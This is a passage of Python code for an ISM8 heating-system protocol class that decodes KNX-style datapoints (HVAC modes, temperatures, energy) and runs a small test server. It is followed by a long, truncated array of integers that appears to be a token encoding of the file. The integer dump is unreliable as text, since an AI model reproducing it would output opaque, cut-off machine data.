self._dp_values.update({dp_id: 'Building Protection'})
elif (length == 1) and (dp_type == "DPT_Scaling"):
# take byte value and multiply by 100/255
self._dp_values.update({dp_id: 100 / 255 * result})
elif (length == 1) and (dp_type == "DPT_DHWMode"):
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'LegioProtect'})
elif result == 2:
self._dp_values.update({dp_id: 'Normal'})
elif result == 3:
self._dp_values.update({dp_id: 'Reduced'})
elif result == 4:
self._dp_values.update({dp_id: 'Off'})
elif (length == 1) and (dp_type == "DPT_HVACContrMode"):
# translate values to clear status-text
if result == 0:
self._dp_values.update({dp_id: 'Auto'})
elif result == 1:
self._dp_values.update({dp_id: 'Heat'})
elif result == 2:
self._dp_values.update({dp_id: 'Morning Warmup'})
elif result == 3:
self._dp_values.update({dp_id: 'Cool'})
elif result == 4:
self._dp_values.update({dp_id: 'Night Purge'})
elif result == 5:
self._dp_values.update({dp_id: 'Precool'})
elif result == 6:
self._dp_values.update({dp_id: 'Off'})
elif result == 7:
self._dp_values.update({dp_id: 'Test'})
elif result == 8:
self._dp_values.update({dp_id: 'Emergency Heat'})
elif result == 9:
self._dp_values.update({dp_id: 'Fan Only'})
elif result == 10:
self._dp_values.update({dp_id: 'Free Cool'})
elif result == 11:
self._dp_values.update({dp_id: 'Ice'})
elif result == 12:
self._dp_values.update({dp_id: 'Maximum Heating Mode'})
elif result == 13:
self._dp_values.update({dp_id: 'Economic Heat/Cool Mode'})
elif result == 14:
self._dp_values.update({dp_id: 'Dehumidification'})
elif result == 15:
self._dp_values.update({dp_id: 'Calibration Mode'})
elif result == 16:
self._dp_values.update({dp_id: 'Emergency Cool Mode'})
elif result == 17:
self._dp_values.update({dp_id: 'Emergency Steam Mode'})
elif result == 20:
self._dp_values.update({dp_id: 'NoDem'})
elif (length == 2) and (dp_type in ("DPT_Value_Temp",
"DPT_Value_Tempd",
"DPT_Tempd",
"DPT_Value_Pres",
"DPT_Power",
"DPT_Value_Volume_Flow"
)):
_sign = (result & 0b1000000000000000) >> 15
_exponent = (result & 0b0111100000000000) >> 11
_mantisse = result & 0b0000011111111111
self._LOGGER.debug(
'binary format {0:b} -> s:{1:b} , m:{2:b} , e:{3:b}'
.format(result, _sign, _mantisse, _exponent))
if _sign == 1:
_mantisse = -(~(_mantisse - 1) & 0x07ff)
self._dp_values.update(
{dp_id: (0.01 * (2 ** _exponent) * _mantisse)})
elif (length == 4) and (dp_type in ("DPT_ActiveEnergy",
"DPT_ActiveEnergy_kWh"
)):
self._dp_values.update({dp_id: result})
else:
self._LOGGER.error('datatype not implemented: %s ', dp_type)
return
if dp_id in self._dp_values.keys():
self._LOGGER.debug('decoded DP %s : %s = %s\n',
dp_id, Ism8.DATAPOINTS[dp_id],
self._dp_values[dp_id])
else:
self._LOGGER.error('could not decode DP %s : %s\n',
dp_id, Ism8.DATAPOINTS[dp_id])
def connection_lost(self, exc):
"""
Is called when connection ends. closes socket.
"""
self._LOGGER.debug('ISM8 closed the connection.Stopping')
self._connected = False
self._transport.close()
def read(self, dp_id):
"""
Returns sensor value from private array of sensor-readings
"""
if dp_id in self._dp_values.keys():
return self._dp_values[dp_id]
else:
return None
if __name__ == "__main__":
_LOGGER = logging.getLogger(__name__)
logging.basicConfig()
_LOGGER.setLevel(logging.DEBUG)
# for testing purposes only, relies on debug output
myProtocol = Ism8()
for keys, values in myProtocol.get_all_sensors().items():
print("%s: %s\n" % (keys, values))
_eventloop = asyncio.get_event_loop()
coro = _eventloop.create_server(myProtocol.factory, '', 12004)
_server = _eventloop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
_LOGGER.debug('Waiting for ISM8 connection on %s',
_server.sockets[0].getsockname())
_eventloop.run_forever()
| [
37811,
201,
198,
26796,
329,
11228,
7508,
422,
8662,
679,
803,
4482,
2884,
3180,
44,
23,
21302,
201,
198,
37811,
201,
198,
201,
198,
11748,
18931,
201,
198,
11748,
30351,
952,
201,
198,
201,
198,
4871,
1148,
76,
23,
7,
292,
13361,
952,
13,
19703,
4668,
2599,
201,
198,
220,
220,
220,
37227,
201,
198,
220,
220,
220,
770,
8435,
1398,
318,
24399,
284,
6004,
284,
3275,
422,
3180,
44,
23,
8265,
290,
201,
198,
220,
220,
220,
3745,
1366,
656,
5387,
1366,
7177,
201,
198,
220,
220,
220,
37227,
201,
198,
201,
198,
220,
220,
220,
3180,
44,
62,
37682,
1137,
796,
275,
6,
59,
87,
3312,
59,
87,
1238,
59,
26152,
15,
59,
87,
1795,
6,
201,
198,
220,
220,
220,
3180,
44,
62,
10943,
45,
62,
37682,
1137,
796,
275,
6,
59,
87,
3023,
59,
87,
405,
59,
87,
405,
59,
87,
405,
6,
201,
198,
220,
220,
220,
3180,
44,
62,
8120,
796,
275,
6,
59,
87,
37,
15,
59,
87,
4521,
59,
87,
405,
59,
87,
405,
59,
87,
405,
59,
87,
405,
59,
87,
405,
6,
201,
198,
220,
220,
220,
3180,
44,
62,
16402,
3069,
796,
275,
6,
59,
87,
3312,
59,
87,
1238,
59,
87,
37,
15,
59,
87,
1795,
59,
87,
405,
59,
87,
1433,
59,
87,
3023,
59,
87,
405,
59,
87,
405,
59,
87,
405,
59,
87,
37,
15,
59,
87,
35,
15,
6,
201,
198,
220,
220,
220,
1303,
6937,
18022,
26515,
329,
4441,
3180,
44,
23,
3127,
6218,
201,
198,
201,
198,
220,
220,
220,
27704,
62,
7206,
27389,
796,
657,
201,
198,
220,
220,
220,
1303,
6376,
286,
8662,
3180,
44,
1388,
3335,
1438,
201,
198,
220,
220,
220,
27704,
62,
20608,
796,
352,
201,
198,
220,
220,
220,
1303,
6376,
286,
4818,
499,
1563,
1438,
201,
198,
220,
220,
220,
27704,
62,
25216,
796,
362,
201,
198,
220,
220,
220,
1303,
6376,
286,
4818,
499,
1563,
2099,
357,
292,
3417,
287,
8662,
7824,
8,
201,
198,
220,
220,
220,
27704,
62,
46747,
796,
513,
201,
198,
220,
220,
220,
1303,
6376,
286,
371,
14,
54,
12,
32109,
357,
16502,
407,
9177,
523,
1290,
8,
201,
198,
220,
220,
220,
27704,
62,
4944,
2043,
796,
604,
201,
198,
220,
220,
220,
1303,
6376,
286,
4326,
6764,
11,
611,
9723,
201,
198,
201,
198,
220,
220,
220,
360,
1404,
2969,
46,
1268,
4694,
796,
1391,
201,
198,
220,
220,
220,
220,
220,
220,
220,
352,
25,
19203,
39,
38,
16,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
362,
25,
19203,
39,
38,
16,
3256,
705,
13056,
5034,
1443,
433,
3256,
705,
6322,
51,
62,
39,
53,
2246,
4264,
81,
19076,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
513,
25,
19203,
39,
38,
16,
3256,
705,
33,
918,
1008,
293,
396,
2150,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
10352,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
604,
25,
19203,
39,
38,
16,
3256,
705,
42,
7878,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
642,
25,
19203,
39,
38,
16,
3256,
705,
16305,
4029,
861,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
718,
25,
19203,
39,
38,
16,
3256,
705,
49,
518,
694,
75,
559,
701,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
767,
25,
19203,
39,
38,
16,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
807,
25,
19203,
39,
38,
16,
3256,
705,
32,
1046,
298,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
860,
25,
19203,
39,
38,
16,
3256,
705,
19580,
20465,
1008,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
838,
25,
19203,
39,
38,
16,
3256,
705,
19580,
679,
528,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1367,
25,
19203,
39,
38,
16,
3256,
705,
19580,
2531,
291,
372,
9435,
538,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1105,
25,
19203,
39,
38,
16,
3256,
705,
19580,
513,
54,
12,
52,
907,
354,
2501,
1151,
346,
3256,
705,
6322,
51,
62,
11505,
26125,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1511,
25,
19203,
39,
38,
16,
3256,
705,
2025,
30909,
437,
30915,
3256,
705,
6322,
51,
62,
11395,
62,
25460,
3256,
10352,
11,
705,
28875,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1478,
25,
19203,
39,
38,
17,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1315,
25,
19203,
39,
38,
17,
3256,
705,
13056,
5034,
1443,
433,
3256,
705,
6322,
51,
62,
39,
53,
2246,
4264,
81,
19076,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1467,
25,
19203,
39,
38,
17,
3256,
705,
33,
918,
1008,
293,
396,
2150,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
10352,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1596,
25,
19203,
39,
38,
17,
3256,
705,
42,
7878,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1248,
25,
19203,
39,
38,
17,
3256,
705,
16305,
4029,
861,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
678,
25,
19203,
39,
38,
17,
3256,
705,
49,
518,
694,
75,
559,
701,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1160,
25,
19203,
39,
38,
17,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2310,
25,
19203,
39,
38,
17,
3256,
705,
32,
1046,
298,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2534,
25,
19203,
39,
38,
17,
3256,
705,
19580,
20465,
1008,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2242,
25,
19203,
39,
38,
17,
3256,
705,
19580,
679,
528,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1987,
25,
19203,
39,
38,
17,
3256,
705,
19580,
2531,
291,
372,
9435,
538,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1679,
25,
19203,
39,
38,
17,
3256,
705,
19580,
513,
54,
12,
52,
907,
354,
2501,
1151,
346,
3256,
705,
6322,
51,
62,
11505,
26125,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2608,
25,
19203,
39,
38,
17,
3256,
705,
2025,
30909,
437,
30915,
3256,
705,
6322,
51,
62,
11395,
62,
25460,
3256,
10352,
11,
705,
28875,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2681,
25,
19203,
39,
38,
18,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2579,
25,
19203,
39,
38,
18,
3256,
705,
13056,
5034,
1443,
433,
3256,
705,
6322,
51,
62,
39,
53,
2246,
4264,
81,
19076,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2808,
25,
19203,
39,
38,
18,
3256,
705,
33,
918,
1008,
293,
396,
2150,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
10352,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1542,
25,
19203,
39,
38,
18,
3256,
705,
42,
7878,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3261,
25,
19203,
39,
38,
18,
3256,
705,
16305,
4029,
861,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3933,
25,
19203,
39,
38,
18,
3256,
705,
49,
518,
694,
75,
559,
701,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4747,
25,
19203,
39,
38,
18,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4974,
25,
19203,
39,
38,
18,
3256,
705,
32,
1046,
298,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3439,
25,
19203,
39,
38,
18,
3256,
705,
19580,
20465,
1008,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4570,
25,
19203,
39,
38,
18,
3256,
705,
19580,
679,
528,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5214,
25,
19203,
39,
38,
18,
3256,
705,
19580,
2531,
291,
372,
9435,
538,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4353,
25,
19203,
39,
38,
18,
3256,
705,
19580,
513,
54,
12,
52,
907,
354,
2501,
1151,
346,
3256,
705,
6322,
51,
62,
11505,
26125,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5014,
25,
19203,
39,
38,
18,
3256,
705,
2025,
30909,
437,
30915,
3256,
705,
6322,
51,
62,
11395,
62,
25460,
3256,
10352,
11,
705,
28875,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2319,
25,
19203,
39,
38,
19,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6073,
25,
19203,
39,
38,
19,
3256,
705,
13056,
5034,
1443,
433,
3256,
705,
6322,
51,
62,
39,
53,
2246,
4264,
81,
19076,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5433,
25,
19203,
39,
38,
19,
3256,
705,
33,
918,
1008,
293,
396,
2150,
3256,
705,
6322,
51,
62,
3351,
4272,
3256,
10352,
11,
705,
4,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5946,
25,
19203,
39,
38,
19,
3256,
705,
42,
7878,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5846,
25,
19203,
39,
38,
19,
3256,
705,
16305,
4029,
861,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4153,
25,
19203,
39,
38,
19,
3256,
705,
49,
518,
694,
75,
559,
701,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6337,
25,
19203,
39,
38,
19,
3256,
705,
54,
1670,
86,
30493,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6298,
25,
19203,
39,
38,
19,
3256,
705,
32,
1046,
298,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4764,
25,
19203,
39,
38,
19,
3256,
705,
19580,
20465,
1008,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5125,
25,
19203,
39,
38,
19,
3256,
705,
19580,
679,
528,
74,
260,
8802,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2026,
25,
19203,
39,
38,
19,
3256,
705,
19580,
2531,
291,
372,
9435,
538,
388,
431,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6885,
25,
19203,
39,
38,
19,
3256,
705,
19580,
513,
54,
12,
52,
907,
354,
2501,
1151,
346,
3256,
705,
6322,
51,
62,
11505,
26125,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6740,
25,
19203,
39,
38,
19,
3256,
705,
2025,
30909,
437,
30915,
3256,
705,
6322,
51,
62,
11395,
62,
25460,
3256,
10352,
11,
705,
64,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7192,
25,
19203,
12261,
16,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7175,
25,
19203,
12261,
16,
3256,
705,
32,
1046,
298,
368,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5996,
25,
19203,
12261,
16,
3256,
705,
21762,
388,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7265,
25,
19203,
12261,
16,
3256,
705,
54,
1670,
86,
562,
364,
692,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7632,
25,
19203,
12261,
16,
3256,
705,
15167,
76,
86,
15668,
679,
528,
74,
260,
271,
3256,
705,
6322,
51,
62,
39,
53,
2246,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7618,
25,
19203,
12261,
16,
3256,
705,
15167,
76,
86,
15668,
25692,
86,
24929,
3256,
705,
6322,
51,
62,
41473,
54,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7863,
25,
19203,
12261,
16,
3256,
705,
1544,
528,
74,
260,
271,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
3126,
25,
19203,
12261,
16,
3256,
705,
1544,
528,
74,
260,
271,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8454,
25,
19203,
12261,
16,
3256,
705,
1544,
528,
74,
260,
271,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8190,
25,
19203,
12261,
16,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8093,
25,
19203,
12261,
16,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5598,
25,
19203,
12261,
16,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6135,
25,
19203,
12261,
16,
3256,
705,
50,
692,
86,
861,
74,
273,
260,
21841,
333,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7930,
25,
19203,
12261,
16,
3256,
705,
50,
1845,
69,
461,
13165,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8275,
25,
19203,
12261,
17,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8257,
25,
19203,
12261,
17,
3256,
705,
21762,
388,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8644,
25,
19203,
12261,
17,
3256,
705,
54,
1670,
86,
562,
364,
692,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4317,
25,
19203,
12261,
17,
3256,
705,
15167,
76,
86,
15668,
14136,
2044,
3256,
705,
6322,
51,
62,
39,
53,
2246,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9166,
25,
19203,
12261,
17,
3256,
705,
15167,
76,
86,
15668,
25692,
86,
24929,
3256,
705,
6322,
51,
62,
41473,
54,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7724,
25,
19203,
12261,
17,
3256,
705,
44,
24645,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8854,
25,
19203,
12261,
17,
3256,
705,
44,
24645,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8915,
25,
19203,
12261,
17,
3256,
705,
44,
24645,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
5441,
25,
19203,
12261,
17,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8684,
25,
19203,
12261,
17,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8541,
25,
19203,
12261,
17,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
8699,
25,
19203,
12261,
17,
3256,
705,
50,
692,
86,
861,
74,
273,
260,
21841,
333,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9225,
25,
19203,
12261,
17,
3256,
705,
50,
1845,
69,
461,
13165,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4019,
25,
19203,
12261,
18,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9773,
25,
19203,
12261,
18,
3256,
705,
21762,
388,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9415,
25,
19203,
12261,
18,
3256,
705,
54,
1670,
86,
562,
364,
692,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9698,
25,
19203,
12261,
18,
3256,
705,
15167,
76,
86,
15668,
14136,
2044,
3256,
705,
6322,
51,
62,
39,
53,
2246,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9508,
25,
19203,
12261,
18,
3256,
705,
15167,
76,
86,
15668,
25692,
86,
24929,
3256,
705,
6322,
51,
62,
41473,
54,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7600,
25,
19203,
12261,
18,
3256,
705,
44,
24645,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9849,
25,
19203,
12261,
18,
3256,
705,
44,
24645,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
10083,
25,
19203,
12261,
18,
3256,
705,
44,
24645,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9193,
25,
19203,
12261,
18,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9919,
25,
19203,
12261,
18,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
362,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
4101,
25,
19203,
12261,
18,
3256,
705,
54,
1670,
86,
24929,
47447,
23065,
76,
513,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
10495,
25,
19203,
12261,
18,
3256,
705,
50,
692,
86,
861,
74,
273,
260,
21841,
333,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
10190,
25,
19203,
12261,
18,
3256,
705,
50,
1845,
69,
461,
13165,
3256,
705,
6322,
51,
62,
12966,
30094,
3256,
6407,
11,
705,
42,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
10261,
25,
19203,
12261,
19,
3256,
705,
1273,
78,
263,
2150,
3256,
705,
6322,
51,
62,
38978,
3256,
10352,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
10048,
25,
19203,
12261,
19,
3256,
705,
21762,
388,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
10352,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
6957,
25,
19203,
12261,
19,
3256,
705,
54,
1670,
86,
562,
364,
692,
11498,
525,
2541,
3256,
705,
6322,
51,
62,
11395,
62,
30782,
3256,
6407,
11,
705,
34,
33809,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9907,
25,
19203,
12261,
19,
3256,
705,
15167,
76,
86,
15668,
14136,
2044,
3256,
705,
6322,
51,
62,
39,
53,
2246,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
10111,
25,
19203,
12261,
19,
3256,
705,
15167,
76,
86,
15668,
25692,
86,
24929,
3256,
705,
6322,
51,
62,
41473,
54,
19076,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
9661,
25,
19203,
12261,
19,
3256,
705,
44,
24645,
47447,
23065,
76,
352,
3256,
705,
6322,
51,
62,
38978,
3256,
6407,
11,
10148,
828,
201,
198,
220,
220,
220,
220,
220,
220,
220,
7388,
25,
19203,
12261,
19,
